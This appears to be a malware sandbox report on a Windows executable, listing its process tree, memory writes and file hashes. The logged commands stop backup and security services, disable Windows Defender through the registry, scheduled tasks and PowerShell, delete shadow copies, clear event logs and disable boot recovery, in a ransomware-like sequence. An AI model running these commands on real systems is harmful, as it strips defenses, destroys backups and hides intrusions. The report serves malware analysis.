df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 3320 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 828 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 828 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1040 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1040 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1268 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1268 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1264 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1264 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1432 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1432 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1788 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1788 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1976 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1976 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1992 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 1992 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 2224 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 2224 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 504 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 504 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 3540 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 3540 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 2208 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe PID 2380 wrote to memory of 2208 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3944
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3668
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3096
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2932
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4020
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4072
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2804
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1188
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12ec5" /y2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12ec5" /y3⤵PID:428
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1164
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:3320
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:828
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1040
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1268
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1264
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1432
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1788
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12ec5" start= disabled2⤵PID:1976
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1992
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2224
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:504
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3540
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2208
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1184
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:864
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3212
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:860
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:616
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1368
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2752
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3704
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2220
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:636
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3700
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:868
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1516
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3604
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:68
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1028
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1116
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:796
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1736
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3552 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3916 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1568 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2344
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2248
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1728
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2252
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1868 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1608
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2992 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3256 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4024 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3960
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2804 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:600 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3740
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5
a5d084db334a6d26c301896f1a6192cd
SHA1e7473be98aed125bd83a7ae55a4ed233f81866b8
SHA25671d0b05798f08f29c416a206c1dca915cbe433f2ad9bbc5c9ef2e98c94717905
SHA5128a54338cb305692dc703c982eca8036ae686b6e457068339b94314158f4f84dd085a212871d5d557c95820aa47feada9c5fe3f3340ac1db77ca90f4444282fcb